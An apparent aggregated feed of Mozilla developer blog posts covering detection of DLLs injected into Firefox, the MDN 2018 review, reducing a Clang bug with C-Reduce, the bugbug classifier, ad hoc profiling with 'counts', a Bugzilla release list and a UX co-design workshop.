Aaron Klotz: 2018 Roundup: Q1

I had a very busy 2018. So busy, in fact, that I have not been able to devote any time to actually discussing what I worked on! I had intended to write these posts during the end of December, but a hardware failure delayed that until the new year. Alas, here we are in 2019, and I am going to do a series of retrospectives on last year’s work, broken up by quarter.

(Links to future posts will go here)

Overview

The general theme of my work in 2018 was dealing with the DLL injection problem: on Windows, third parties love to forcibly load their DLLs into other processes – web browsers in particular – which makes Firefox a primary target.

Many of these libraries tend to alter Firefox processes in ways that hurt the stability and/or performance of our code; many chemspill releases have gone out over the years to deal with these problems. While I could rant for hours over this, the fact is that DLL injection is rampant in the ecosystem of Windows desktop applications and is not going to disappear any time soon. In the meantime, we need to be able to deal with it.

Some astute readers might be ready to send me an email or post a comment about how ignorant I am about the new(-ish) process mitigation policies that are available in newer versions of Windows. While those features are definitely useful, they are not panaceas:

  • We cannot turn on the “Extension Point Disable” policy for users of assistive technologies; screen readers rely heavily on DLL injection using SetWindowsHookEx and SetWinEventHook, both of which are covered by this policy;
  • We could enable the “Microsoft Binary Signature” policy, however that requires us to load our own DLLs (which are not signed by Microsoft) before enabling it; once that happens, it is often already too late: other DLLs have already injected themselves by the time we are able to activate this policy. (Note that this could easily be solved if this policy were augmented to also permit loading of any DLL signed by the same organization as that of the process’s executable binary, but Microsoft seems to be unwilling to do this.)
  • The above mitigations are not universally available. They do not help us on Windows 7.

For me, Q1 2018 was all about gathering better data about injected DLLs.

Learning More About DLLs Injected into Firefox

One of our major pain points over the years of dealing with injected DLLs has been that the vendor of the DLL is not always apparent to us. In general, our crash reports and telemetry pings only include the leaf name of the various DLLs on a user’s system. This is intentional on our part: we want to preserve user privacy. On the other hand, this severely limits our ability to determine which party is responsible for a particular DLL.

One avenue for obtaining this information is to look at any digital signature that is embedded in the DLL. By examining the certificate that was used to sign the binary, we can extract the organization of the cert’s owner and include that with our crash reports and telemetry.
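
As a rough illustration of the idea (not the code that shipped, which uses the Windows Authenticode APIs from C++ as described below), here is a Python sketch that parses the Authenticode blob out of a PE file with the pefile and cryptography packages and prints the organization field of each embedded certificate. The DLL path is a placeholder, and picking out the actual signing certificate from the embedded chain takes more care than this:

# Sketch: print the O= (organization) field of every certificate embedded in
# a signed PE's Authenticode signature, using the pefile and cryptography
# packages. "example.dll" is a placeholder path.
import pefile
from cryptography.hazmat.primitives.serialization import pkcs7
from cryptography.x509.oid import NameOID

path = "example.dll"
pe = pefile.PE(path)
security = pe.OPTIONAL_HEADER.DATA_DIRECTORY[
    pefile.DIRECTORY_ENTRY["IMAGE_DIRECTORY_ENTRY_SECURITY"]]

if security.VirtualAddress and security.Size:
    with open(path, "rb") as f:
        # The security directory's VirtualAddress is a raw file offset; skip
        # the 8-byte WIN_CERTIFICATE header to reach the PKCS#7 blob.
        f.seek(security.VirtualAddress + 8)
        blob = f.read(security.Size - 8)
    for cert in pkcs7.load_der_pkcs7_certificates(blob):
        for attr in cert.subject.get_attributes_for_oid(NameOID.ORGANIZATION_NAME):
            print(attr.value)
else:
    print("no embedded Authenticode signature")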

In bug 1430857 I wrote a bunch of code that enables us to extract that information from signed binaries using the Windows Authenticode APIs. Originally, in that bug, all of that signature extraction work happened from within the browser itself: it gathered the cert information on a background thread while the browser was running, and included those annotations in a subsequent crash dump, should such a thing occur.

After some reflection, I realized that I was not gathering annotations in the right place. As an example, what if an injected DLL were to trigger a crash before the background thread had a chance to grab that DLL’s cert information?

I realized that the best place to gather this information was in a post-processing step after the crash dump had been generated, and in fact we already had the right mechanism for doing so: the minidump-analyzer program was already doing post-processing on Firefox crash dumps before sending them back to Mozilla. I moved the signature extraction and crash annotation code out of Gecko and into the analyzer in bug 1436845.

(As an aside, while working on the minidump-analyzer, I found some problems with how it handled command line arguments: it was assuming that main passes its argv as UTF-8, which is not true on Windows. I fixed those issues in bug 1437156.)

In bug 1434489 I also ended up adding this information to the “modules ping” that we have in telemetry; IIRC this ping is only sent weekly. When the modules ping is requested, we gather the module cert info asynchronously on a background thread.

Finally, I had to modify Socorro (the back-end for crash-stats) to be able to understand the signature annotations and be able to display them via bug 1434495. This required two commits: one to modify the Socorro stackwalker to merge the module signature information into the full crash report, and another to add a “Signed By” column to every report’s “Modules” tab to display the signature information (Note that this column is only present when at least one module in a particular crash report contains signature information).

The end result was very satisfying: Most of the injected DLLs in our Windows crash reports are signed, so it is now much easier to identify their vendors!

This project was very satisfying for me in many ways: first of all, surfacing this information was an itch that I had been wanting to scratch for quite some time. Secondly, this really was a “full stack” project, touching everything from extracting signature info from binaries using C++, all the way up to writing some back-end code in Python and a little touch of front-end work to surface the data in the web app.

Note that, while this project focused on Windows because of the severity of the library injection problem on that platform, it would be easy enough to reuse most of this code for macOS builds as well; the only major work for the latter case would be for extracting signature information from a dylib. This is not currently a priority for us, though.

Thanks for reading! Coming up in Q2: Refactoring the Windows DLL Interceptor!

Hacks.Mozilla.Org: MDN Changelog – Looking back at 2018

December is when Mozilla meets as a company for our biannual All-Hands, and we reflect on the past year and plan for the future. Here are some of the highlights of 2018.

The browser-compat-data (BCD) project required a sustained effort to convert MDN’s documentation to structured data. The conversion was 39% complete at the start of 2018, and ended the year at 98% complete. Florian Scholz coordinated a large community of staff and volunteers, breaking up the work into human-sized chunks that could be done in parallel. The community converted, verified, and refreshed the data, and converted thousands of MDN pages to use the new data sources. Volunteers also built tools and integrations on top of the data.

The interactive-examples project had a great year as well. Will Bamberg coordinated the work, including some all-staff efforts to write new examples. Schalk Neethling improved the platform as it grew to handle CSS, JavaScript, and HTML examples.

In 2018, MDN developers moved from MozMEAO to Developer Outreach, joining the content staff in Emerging Technologies. The organizational change in March was followed by a nine-month effort to move the servers to the new ET account. Ryan Johnson, Ed Lim, and Dave Parfitt completed the smoothest server transition in MDN’s history.

The strength of MDN is our documentation of fundamental web technologies. Under the leadership of Chris Mills, this content was maintained, improved, and expanded in 2018. It’s a lot of work to keep an institution running and growing, and there are few opportunities to properly celebrate that work. Thanks to Daniel Beck, Eric Shepherd, Estelle Weyl, Irene Smith, Janet Swisher, Rachel Andrew, and our community of partners and volunteers for keeping MDN awesome in 2018.

Kadir Topal led the rapid development of the payments project. We’re grateful to all the MDN readers who are supporting the maintenance and growth of MDN.

There’s a lot more that happened in 2018:

  • January – Added a language preference dialog, and added rate limiting.
  • February – Prepared to move developers to Emerging Technologies.
  • March – Ran a Hack on MDN event for BCD, and tried Brotli.
  • April – Moved MDN to a CDN, and started switching to SVG.
  • May – Moved to ZenHub.
  • June – Shipped Django 1.11.
  • July – Decommissioned zones, and tried new CDN experiments.
  • August – Started performance improvements, added section links, removed memcache from Kuma, and upgraded to ElasticSearch 5.
  • September – Ran a Hack on MDN event for accessibility, and deleted 15% of macros.
  • October – Completed the server migration, and shipped some performance improvements.
  • November – Completed the migration to SVG, and updated the compatibility table header rows.

Shipped tweaks and fixes

There were 124 PRs merged in December, including some important changes and fixes. 27 of those pull requests came from 26 first-time contributors.

Planned for January

David Flanagan took a look at KumaScript, MDN’s macro rendering engine, and is proposing several changes to modernize it, including using await and Jest. These changes are performing well in the development environment, and we plan to get the new code in production in January.


Nick Desaulniers: Finding compiler bugs with C-Reduce

Support for a long-awaited GNU C extension, asm goto, is in the midst of landing in Clang and LLVM. We want to make sure that we release a high quality implementation, so it’s important to test the new patches on real code and not just small test cases. When we hit compiler bugs in large source files, it can be tricky to find exactly which part of a potentially large translation unit is problematic. In this post, we’ll take a look at using C-Reduce, a multithreaded code bisection utility for C/C++, to help narrow down a reproducer for a real compiler bug (potentially; it’s in a patch that was posted, and will be fixed before it can ship in production) from a real code base (the Linux kernel). It’s mostly a post to my future self, so that I can remind myself how to run C-Reduce on the Linux kernel again, since this is now the third real compiler bug it’s helped me track down.

The bug I’m focusing on shows up when trying to compile the Linux kernel with Clang: a linkage error, all the way at the end of the build.

drivers/spi/spidev.o:(__jump_table+0x74): undefined reference to `.Ltmp4'

Hmm…looks like the object file (drivers/spi/spidev.o) has a section (__jump_table) that references a non-existent symbol (.Ltmp4), which looks like a temporary label that should have been cleaned up by the compiler. Maybe it was accidentally left behind by an optimization pass?

To run C-Reduce, we need a shell script that returns 0 when it should keep reducing, and an input file. For the input file, it’s just way simpler to use preprocessed source; this helps cut down on the compiler flags, which typically require paths (-I, -L).

Preprocess

First, let’s preprocess the source. For the kernel, if the file compiles correctly, the kernel’s Kbuild build process will create a file named in the form path/to/.file.o.cmd, in our case drivers/spi/.spidev.o.cmd. (If the file doesn’t compile, then I’ve had success hooking make path/to/file.o with bear and then getting the compile_commands.json for the file.) I find it easiest to copy this file to a new shell script, then strip out everything but the first line. I then replace the -c -o <output>.o with -E, chmod +x that new shell script, and run it (outputting to stdout) to eyeball that it looks preprocessed, then redirect the output to a .i file. Now that we have our preprocessed input, let’s create the C-Reduce shell script.

Reproducer

I find it helpful to have a shell script in the form:

  1. remove previous object files
  2. rebuild object files
  3. disassemble object files and pipe to grep

For you, it might be some different steps. As the docs show, you just need the shell script to return 0 when it should keep reducing. Starting from our previous shell script that preprocessed the source and dumped a .i file, let’s change it back to stop before linking rather than preprocessing (s/-E/-c/), and change the input to our new .i file. Finally, let’s add the test for what we want. Since I want C-Reduce to keep reducing until the disassembled object file no longer references anything Ltmp related, I write:

$ objdump -Dr -j __jump_table spidev.o | grep Ltmp > /dev/null
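
Putting the three steps together, the whole interestingness test ends up quite small. The real spidev_asm_goto.sh is a plain shell script whose compile line is copied from drivers/spi/.spidev.o.cmd; the following Python rendering, with a placeholder clang invocation, is only meant to illustrate the structure:

#!/usr/bin/env python3
# Illustrative interestingness test: exit 0 ("keep reducing") only while the
# reduced spidev.i still compiles and its __jump_table section still
# references an Ltmp symbol. The clang flags here are placeholders; the real
# script reuses the exact command line recorded in drivers/spi/.spidev.o.cmd.
import subprocess
import sys

def sh(cmd):
    return subprocess.run(cmd, shell=True).returncode

sh("rm -f spidev.o")                              # 1. remove old object files
if sh("clang -O2 -c spidev.i -o spidev.o") != 0:  # 2. rebuild
    sys.exit(1)
# 3. disassemble and grep: grep (and thus this script) exits 0 iff a match
#    for Ltmp is still present in the __jump_table section.
sys.exit(sh("objdump -Dr -j __jump_table spidev.o | grep Ltmp > /dev/null"))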

Now I can run the reproducer to check that it at least returns 0, which C-Reduce needs to get started:

$ ./spidev_asm_goto.sh
$ echo $?
0

Running C-Reduce

Now that we have a reproducer script and input file, let’s run C-Reduce.

$ time creduce --n 40 spidev_asm_goto.sh spidev.i
===< 144926 >===
running 40 interestingness tests in parallel
===< pass_includes :: 0 >===
===< pass_unifdef :: 0 >===
===< pass_comments :: 0 >===
===< pass_blank :: 0 >===
(0.7 %, 2393679 bytes)
(5.3 %, 2282207 bytes)
===< pass_clang_binsrch :: replace-function-def-with-decl >===
(12.6 %, 2107372 bytes)
...
===< pass_indent :: final >===
(100.0 %, 156 bytes)
===================== done ====================

pass statistics:
  method pass_clang_binsrch :: remove-unused-function worked 1 times and failed 0 times
...
  method pass_lines :: 0 worked 427 times and failed 998 times
            ******** /android0/kernel-all/spidev.i ********

a() {
  int b;
  c();
  if (c < 2)
    b = d();
  else {
    asm goto("1:.long b - ., %l[l_yes] - . \n\t" : : : : l_yes);
  l_yes:;
  }
  if (b)
    e();
}
creduce --n 40 spidev_asm_goto.sh spidev.i  1892.35s user 1186.10s system 817% cpu 6:16.76 total
$ wc -l spidev.i.orig
56160 spidev.i.orig
$ wc -l spidev.i
12 spidev.i

So it took C-reduce just over 6 minutes to turn >56k lines of mostly irrelevant code into 12 when running 40 threads on my 48 core workstation.

It’s also highly entertaining to watch C-Reduce work its magic. In another terminal, I highly recommend running watch -n1 cat <input_file_to_creduce.i> to see it pared down before your eyes.

Jump to 4:24 in the asciicast recording to see where things really pick up.

Finally, we still want to bisect our compiler flags (the kernel uses a lot). I still do this process manually, and it’s not too bad. Having proper and minimal steps to reproduce compiler bugs is critical.

That’s enough for a great bug report for now. In a future episode, we’ll see how to start pulling apart llvm to see where compilation is going amiss.

Nick Cameron: Leaving Mozilla and (most of) the Rust project

Today is my last day as an employee of Mozilla. It's been almost exactly seven years - two years working on graphics and layout for Firefox, and five years working on Rust. Mostly remote, with a few stints in the Auckland office. It has been an amazing time: I've learnt an incredible amount, worked on some incredible projects, and got to work with some absolutely incredible people. BUT, it is time for me to learn some new things, and work on some new things with some new people.

Nearly everyone I've had contact with at Mozilla has been kind and smart and fun to work with. I would have liked to give thanks and a shout-out to a long list of people I've learned from or had fun with, but the list would be too long and still incomplete.

I'm going to be mostly stepping back from the Rust project too. I'm pretty sad about that (although I hope it will be worth it) - it's an extremely exciting, impactful project. As a PL researcher turned systems programmer, it really has been a dream project to work on. The Rust team at Mozilla and the Rust community in general are good people, and I'll miss working with you all terribly.

Concretely, I plan to continue to co-lead the Cargo and IDEs and Editors teams. I'll stay involved with the Rustfmt and Rustup working groups for a little while. I'll be leaving the other teams I'm involved with, including the core team (although I'll stick around in a reduced capacity for a few months). I won't be involved with code and review for Rust projects day-to-day. But I'll still be around on Discord and GitHub if needed for mentoring or occasional review; I will probably take much longer to respond.

None of the projects I've worked on are going to be left unmaintained: I'm very confident in the people working on them, in the teams I'm leaving behind, and in the Rust community in general (did I say you were awesome already?).

I'm very excited about my next steps (which I'll leave for another post), but for now I'm feeling pretty emotional about moving on from the Rust project and the Rust team at Mozilla. It's been a big part of my life for five years and I'm going to miss y'all. <3

P.S., it turns out that Steve is also leaving Mozilla - this is just a coincidence and there is no conspiracy or shared motive. We have different reasons for leaving, and neither of us knew the other was leaving until after we'd put in our notice. As far as I know, there is no bad blood between either of us and the Rust team.

Marco Castelluccio: “It’s not a bug, it’s a feature.” - Differentiating between bugs and non-bugs using machine learning

Bugzilla is a noisy data source: bugs are used to track anything, from “Create an LDAP account for contributor X” to “Printing page Y doesn’t work”. This makes it hard to know which bugs are bugs and which bugs are not bugs but e.g. feature requests, or meta bugs, or refactorings, and so on. To ease reading the next paragraphs, I’ll use bugbug for bugs that are actually bugs, fakebug for bugs that are not actually bugs, and bug for all Bugzilla bugs (bugbug + fakebug).

Why do we need to tell if a bug is actually a bug? There are several reasons, the main two being:

  • Quality metrics: to analyze the quality of a project, to measure the churn of a given release, it can be useful to know, for example, how many bugbugs are filed in a given release cycle. If we don’t know which bugs are bugbugs and which are feature requests, we can’t precisely measure how many problems are found (= bugbugs filed) in a given component for a given release, we can only know the overall number, confusing bugbugs and feature work;
  • Bug prediction: given the development history of the project, one can try to predict, with some measure of accuracy, which changes are risky and more likely to lead to regressions in the future. In order to do that, of course, you need to know which changes introduced problems in the past. If you can’t identify problems (i.e. bugbugs), then you can’t identify changes that introduced them!

On BMO, we have some optional keywords to identify regressions vs features, but they are not used consistently (and, being optional, they can’t be. We can work on improving the practices, but we can’t reach perfection when there is human involvement). So, we need another way to identify them. A possibility is to use handwritten rules (‘mozregression’ in comment → regression; ‘support’ in title → feature), which can be precise up to a certain accuracy level, but any improvement over that requires hard manual labor. Another option is to use machine learning techniques, leaving the hard work of extracting information from bug features to the machines!

The bugbug project is trying to do just that, at first with a very simple ML architecture.

We have a set of 1913 bugs, manually labelled as one of the two possible classes (bugbug vs fakebug). We augment this manually labelled set with Bugzilla bugs containing the keywords ‘regression’ or ‘feature’, which are basically labelled already. The augmented data set contains 10818 bugs. Unfortunately we can’t use all of them indiscriminately, as the dataset is unbalanced towards bugbugs, which would skew the results of the classifier, so we simply perform random under-sampling to reduce the number of bugbug examples. In the end, we have 1928 bugs.

We split the dataset into a training set of 1735 bugs and a test set of 193 bugs (90% - 10%).

We extract features both from bug fields (such as keywords, number of attachments, presence of a crash signature, and so on), bug title and comments.

To extract features from text (title and comments), we use a simple BoW model with 1-grams, using TF-IDF to lower the importance of very common words in the corpus, plus stop word removal (stop word removal should not be needed for accuracy in our case, since we are using a gradient boosting model, but it speeds up the training phase and eases experimenting with other models that would really need it).

We are then training a gradient boosting model (these models usually work quite well for shallow features) on top of the extracted features.
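
As a rough sketch of what such a pipeline can look like (this is not the actual bugbug code; the input file and the “title”, “comments”, and “label” columns are made up for illustration), the text-only part could be written with scikit-learn as follows:

# Rough sketch of the text-classification pipeline described above, using
# scikit-learn. The CSV file and the "title", "comments" and "label" columns
# are hypothetical; the real bugbug code differs in many details.
import pandas as pd
from sklearn.ensemble import GradientBoostingClassifier
from sklearn.feature_extraction.text import TfidfVectorizer
from sklearn.metrics import accuracy_score
from sklearn.model_selection import train_test_split

bugs = pd.read_csv("labelled_bugs.csv")  # hypothetical labelled data set

# Random under-sampling: keep only as many bugbugs (label == 1) as there are
# fakebugs (label == 0), so the classes are balanced.
fake = bugs[bugs["label"] == 0]
real = bugs[bugs["label"] == 1].sample(n=len(fake), random_state=0)
balanced = pd.concat([fake, real])

# Bag-of-words (1-grams) over title + comments, weighted with TF-IDF and with
# English stop words removed.
vectorizer = TfidfVectorizer(ngram_range=(1, 1), stop_words="english")
X = vectorizer.fit_transform(balanced["title"] + " " + balanced["comments"])
y = balanced["label"]

# 90% / 10% train/test split, then a gradient boosting classifier.
X_train, X_test, y_train, y_test = train_test_split(
    X, y, test_size=0.1, random_state=0)
clf = GradientBoostingClassifier()
clf.fit(X_train, y_train)
print("accuracy:", accuracy_score(y_test, clf.predict(X_test)))

The actual model also folds in the bug-field features mentioned above alongside the text features before training.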

Figure 1: A high-level overview of the architecture.

This very simple approach, in a handful of lines of code, achieves ~93% accuracy. There’s a lot of room for improvement in the algorithm (it was, after all, written in a few hours…), so I’m confident we can get even better results.

This is just the first step: in the near future we are going to implement improvements in Bugzilla directly and in linked tooling so that we can stop guessing and have very accurate data.

Since the inception of bugbug, we have also added additional experimental models for other related problems (e.g. detecting if a bug is a good candidate for tracking, or predicting the component of a bug), turning bugbug into a platform for quickly building and experimenting with new machine learning applications on Bugzilla data (and maybe soon VCS data too). We have many other ideas to implement, if you are interested take a look at the open issues on our repo!

Nicholas Nethercote: Ad Hoc Profiling

I have used a variety of profiling tools over the years, including several I wrote myself.

But there is one profiling tool I have used more than any other. It is capable of providing invaluable, domain-specific profiling data of a kind not obtainable by any general-purpose profiler.

It’s a simple text processor implemented in a few dozen lines of code. I use it in combination with logging print statements in the programs I am profiling. No joke.

Post-processing

The tool is called counts, and it tallies line frequencies within text files, like an improved version of the Unix command chain sort | uniq -c. For example, given the following input.

a 1
b 2
b 2
c 3
c 3
c 3
d 4
d 4
d 4
d 4

counts produces the following output.

10 counts:
(  1)        4 (40.0%, 40.0%): d 4
(  2)        3 (30.0%, 70.0%): c 3
(  3)        2 (20.0%, 90.0%): b 2
(  4)        1 (10.0%,100.0%): a 1

It gives a total line count, and shows all the unique lines, ordered by frequency, with individual and cumulative percentages.

Alternatively, when invoked with the -w flag, it assigns each line a weight, determined by the last integer that appears on the line (or 1 if there is no such integer).  On the same input, counts -w produces the following output.

30 counts:
(  1)       16 (53.3%, 53.3%): d 4
(  2)        9 (30.0%, 83.3%): c 3
(  3)        4 (13.3%, 96.7%): b 2
(  4)        1 ( 3.3%,100.0%): a 1

The total and per-line counts are now weighted; the output incorporates both frequency and a measure of magnitude.

That’s it. That’s all counts does. I originally implemented it in 48 lines of Perl, then later rewrote it as 48 lines of Python, and then later again rewrote it as 71 lines of Rust.
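
For a sense of how little there is to it, here is a minimal Python sketch of the behaviour described above (an approximation for illustration, not the real implementation):

#!/usr/bin/env python3
# Approximate re-implementation of the behaviour described above, for
# illustration only. Reads lines from stdin; pass -w for weighted mode.
import re
import sys
from collections import Counter

weighted = "-w" in sys.argv[1:]
tallies = Counter()
for line in sys.stdin:
    line = line.rstrip("\n")
    weight = 1
    if weighted:
        ints = re.findall(r"-?\d+", line)
        if ints:
            weight = int(ints[-1])  # last integer on the line, else 1
    tallies[line] += weight

total = sum(tallies.values())
if total == 0:
    sys.exit(0)
print(f"{total} counts:")
cumulative = 0
for rank, (line, count) in enumerate(tallies.most_common(), start=1):
    cumulative += count
    print(f"({rank:3}) {count:8} ({100*count/total:4.1f}%,{100*cumulative/total:5.1f}%): {line}")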

In terms of benefit-to-effort ratio, it is by far the best code I have ever written.

counts in action

As an example, I added print statements to Firefox’s heap allocator so it prints a line for every allocation that shows its category, requested size, and actual size. A short run of Firefox with this instrumentation produced a 77 MB file containing 5.27 million lines. counts produced the following output for this file.

5270459 counts:
( 1) 576937 (10.9%, 10.9%): small 32 (32)
( 2) 546618 (10.4%, 21.3%): small 24 (32)
( 3) 492358 ( 9.3%, 30.7%): small 64 (64)
( 4) 321517 ( 6.1%, 36.8%): small 16 (16)
( 5) 288327 ( 5.5%, 42.2%): small 128 (128)
( 6) 251023 ( 4.8%, 47.0%): small 512 (512)
( 7) 191818 ( 3.6%, 50.6%): small 48 (48)
( 8) 164846 ( 3.1%, 53.8%): small 256 (256)
( 9) 162634 ( 3.1%, 56.8%): small 8 (8)
( 10) 146220 ( 2.8%, 59.6%): small 40 (48)
( 11) 111528 ( 2.1%, 61.7%): small 72 (80)
( 12) 94332 ( 1.8%, 63.5%): small 4 (8)
( 13) 91727 ( 1.7%, 65.3%): small 56 (64)
( 14) 78092 ( 1.5%, 66.7%): small 168 (176)
( 15) 64829 ( 1.2%, 68.0%): small 96 (96)
( 16) 60394 ( 1.1%, 69.1%): small 88 (96)
( 17) 58414 ( 1.1%, 70.2%): small 80 (80)
( 18) 53193 ( 1.0%, 71.2%): large 4096 (4096)
( 19) 51623 ( 1.0%, 72.2%): small 1024 (1024)
( 20) 45979 ( 0.9%, 73.1%): small 2048 (2048)

Unsurprisingly, small allocations dominate. But what happens if we weight each entry by its size? counts -w produced the following output.

2554515775 counts:
( 1) 501481472 (19.6%, 19.6%): large 32768 (32768)
( 2) 217878528 ( 8.5%, 28.2%): large 4096 (4096)
( 3) 156762112 ( 6.1%, 34.3%): large 65536 (65536)
( 4) 133554176 ( 5.2%, 39.5%): large 8192 (8192)
( 5) 128523776 ( 5.0%, 44.6%): small 512 (512)
( 6) 96550912 ( 3.8%, 48.3%): large 3072 (4096)
( 7) 94164992 ( 3.7%, 52.0%): small 2048 (2048)
( 8) 52861952 ( 2.1%, 54.1%): small 1024 (1024)
( 9) 44564480 ( 1.7%, 55.8%): large 262144 (262144)
( 10) 42200576 ( 1.7%, 57.5%): small 256 (256)
( 11) 41926656 ( 1.6%, 59.1%): large 16384 (16384)
( 12) 39976960 ( 1.6%, 60.7%): large 131072 (131072)
( 13) 38928384 ( 1.5%, 62.2%): huge 4864000 (4866048)
( 14) 37748736 ( 1.5%, 63.7%): huge 2097152 (2097152)
( 15) 36905856 ( 1.4%, 65.1%): small 128 (128)
( 16) 31510912 ( 1.2%, 66.4%): small 64 (64)
( 17) 24805376 ( 1.0%, 67.3%): huge 3097600 (3100672)
( 18) 23068672 ( 0.9%, 68.2%): huge 1048576 (1048576)
( 19) 22020096 ( 0.9%, 69.1%): large 524288 (524288)
( 20) 18980864 ( 0.7%, 69.9%): large 5432 (8192)

This shows that the cumulative count of allocated bytes (2.55GB) is dominated by a mixture of larger allocation sizes.

This example gives just a taste of what counts can do.

(An aside: in both cases it’s good to see there isn’t much slop, i.e. the differences between the requested sizes and actual sizes are mostly 0. That 5432 entry at the bottom of the second table is curious, though.)

Other Uses

This technique is often useful when you already know something — e.g. a general-purpose profiler showed that a particular function is hot — but you want to know more.

  • Exactly how many times are paths X, Y and Z executed? For example, how often do lookups succeed or fail in data structure D? Print an identifying string each time a path is hit.
  • How many times does loop L iterate? What does the loop count distribution look like? Is it executed frequently with a low loop count, or infrequently with a high loop count, or a mix? Print the iteration count before or after the loop.
  • How many elements are typically in hash table H at this code location? Few? Many? A mixture? Print the element count.
  • What are the contents of vector V at this code location? Print the contents.
  • How many bytes of memory are used by data structure D at this code location? Print the byte size.
  • Which call sites of function F are the hot ones? Print an identifying string at the call site.

Then use counts to aggregate the data. Often this domain-specific data is critical to fully optimize hot code.

Worse is better

Print statements are an admittedly crude way to get this kind of information, profligate with I/O and disk space. In many cases you could do it in a way that uses machine resources much more efficiently, e.g. by creating a small table data structure in the code to track frequencies, and then printing that table at program termination.

But that would require:

  • writing the custom table (collection and printing);
  • deciding where to define the table;
  • possibly exposing the table to multiple modules;
  • deciding where to initialize the table; and
  • deciding where to print the contents of the table.

That is a pain, especially in a large program you don’t fully understand.

Alternatively, sometimes you want information that a general-purpose profiler could give you, but running that profiler on your program is a hassle because the program you want to profile is actually layered under something else, and setting things up properly takes effort.

In contrast, inserting print statements is trivial. Any measurement can be set up in no time at all. (Recompiling is often the slowest part of the process.) This encourages experimentation. You can also kill a running program at any point with no loss of profiling data.

Don’t feel guilty about wasting machine resources; this is temporary code. You might sometimes end up with output files that are gigabytes in size. But counts is fast because it’s so simple… and the Rust version is 3–4x faster than the Python version, which is nice. Let the machine do the work for you. (It does help if you have a machine with an SSD.)

Ad Hoc Profiling

For a long time I have, in my own mind, used the term ad hoc profiling to describe this combination of logging print statements and frequency-based post-processing. Wikipedia defines “ad hoc” as follows.

In English, it generally signifies a solution designed for a specific problem or task, non-generalizable, and not intended to be able to be adapted to other purposes

The process of writing custom code to collect this kind of profiling data — in the manner I disparaged in the previous section — truly matches this definition of “ad hoc”.

But counts is valuable precisely because it makes this type of custom profiling less ad hoc and more repeatable. I should arguably call it “generalized ad hoc profiling” or “not so ad hoc profiling”… but those names don’t have quite the same ring to them.

Tips

Use unbuffered output for the print statements. In C and C++ code, use fprintf(stderr, ...). In Rust code use eprintln!. (Update: Rust 1.32 added the dbg! macro, which also works well.)

Pipe the stderr output to file, e.g. firefox 2> log.

Sometimes programs print other lines of output to stderr that should be ignored by counts. (Especially if they include integer IDs that counts -w would interpret as weights!) Prepend all logging lines with a short identifier, and then use grep $ID log | counts to ignore the other lines. If you use more than one prefix, you can grep for each prefix individually or all together.

Occasionally output lines get munged together when multiple print statements are present. Because there are typically many lines of output, having a few garbage ones almost never matters.

It’s often useful to use both counts and counts -w on the same log file; each one gives different insights into the data.

To find which call sites of a function are hot, you can instrument the call sites directly. But it’s easy to miss one, and the same print statements need to be repeated multiple times. An alternative is to add an extra string or integer argument to the function, pass in a unique value from each call site, and then print that value within the function.

It’s occasionally useful to look at the raw logs as well as the output of counts, because the sequence of output lines can be informative. For example, I recently diagnosed an occurrence of quadratic behaviour in the Rust compiler by seeing that a loop iterated 1, 2, 3, …, 9000+ times.

The Code

counts is available here.

Conclusion

I use counts to do ad hoc profiling all the time. It’s the first tool I reach for any time I have a question about code execution patterns. I have used it extensively for every bout of major performance work I have done in the past few years, as well as in plenty of other circumstances. I even built direct support for it into rustc-perf, the Rust compiler’s benchmark suite, via the profile eprintln subcommand. Give it a try!

Mozilla B-Team: Happy BMO Push Day!

From https://github.com/mozilla-bteam/bmo/tree/release-20190116.4, the following changes have been pushed to bugzilla.mozilla.org:

  • [1518522] phabbugz comments in bugs need to set is_markdown to true
  • [1493253] Embed crash count table to bug pages
  • [1518264] New non-monospace comments styled with way too small a font size
  • [1500441] Make site-wide announcement dismissable
  • [1519240] Markdown comments ruin links wrapped in <>
  • [1519157] Linkification is disabled on <h1>, <h2> etc.
  • [1518328] The edit comment feature should have a preview mode as well
  • [1510996] Abandoned phabricator revisions should be hidden by default
  • [1518967] Edit attachment as comment does markdown, which is very unexpected
  • [1519659] Need to reload the page before being able to edit
  • [1520221] Avoid wrapping markdown comments
  • [1520495] Crash count table does not detect uplift links in Markdown comments
  • [1519564] Add a mechanism for disabling all special markdown syntax
Discuss these changes on mozilla.tools.bmo.

Firefox UX: Reflections on a co-design workshop

Authors: Jennifer Davidson, Meridel Walkington, Emanuela Damiani, Philip Walmsley

Co-design workshops help designers learn first-hand the language of the people who use their products, in addition to their pain points, workflows, and motivations. With co-design methods [1] participants are no longer passive recipients of products. Rather, they are involved in the envisioning and re-imagination of them. Participants show us what they need and want through sketching and design exercises. The purpose of a co-design workshop is not to have a pixel-perfect design to implement, rather it’s to learn more about the people who use or will use the product, and to involve them in generating ideas about what to design.

We ran a co-design workshop at Mozilla to inform our product design, and we’d like to share our experience with you.

Sketching exercises during the co-design workshop were fueled by coffee and tea.

Before the workshop

Our UX team was tasked with improving the Firefox browser extension experience. When people create browser extensions, they use a form to submit their creations. They submit their code and all the metadata about the extension (name, description, icon, etc.). The metadata provided in the submission form is used to populate the extension’s product page on addons.mozilla.org.

A cropped screenshot of the third step of the submission form, which asks for metadata like name and description of the extension.
Screenshot of an extension product page on addons.mozilla.org.

The Mozilla Add-ons team (i.e., Mozilla staff who work on improving the extensions and themes experience) wanted to make sure that the process to submit an extension is clear and useful, yielding a quality product page that people can easily find and understand. Improving the submission flow for developers would lead to higher quality extensions for people to use.

We identified some problems by using test extensions to “eat our own dog food” (i.e. walk through the current process). Our content strategist audited the submission flow experience to understand product page guidelines in the submission flow. Then some team members conducted a cognitive walkthrough [2] to gain knowledge of the process and identify potential issues.

After identifying some problems, we sought to improve our submission flow for browser extensions. We decided to run a co-design workshop that would identify more problem areas and generate new ideas. The workshop took place in London on October 26, one day before MozFest, an annual week-long “celebration for, by, and about people who love the internet.” Extension and theme creators were selected from our global add-ons community to participate in the workshop. Mozilla staff members were involved, too: program managers, a community manager, an Engineering manager, and UX team members (designers, a content strategist, and a user researcher).

A helpful and enthusiastic sticky note on the door of our workshop room. Image: “Submission flow workshop in here!!” posted on a sticky note on a wooden door.

Steps we took to create and organize the co-design workshop

After the audit and cognitive walkthrough, we thought a co-design workshop might help us get to a better future. So we did the following:

  1. Pitch the idea to management and get buy-in
  2. Secure budget
  3. Invite participants
  4. Interview participants (remotely)
  5. Analyze interviews
  6. Create an agenda for the workshop. Our agenda included: ice breaker, ground rules, discussion of interview results, sketching (using this method [3]) & critique sessions, creating a video pitch for each group’s final design concept.
  7. Create workshop materials
  8. Run the workshop!
  9. Send out a feedback survey
  10. Debrief with Mozilla staff
  11. Analyze results (over three days) with Add-ons UX team
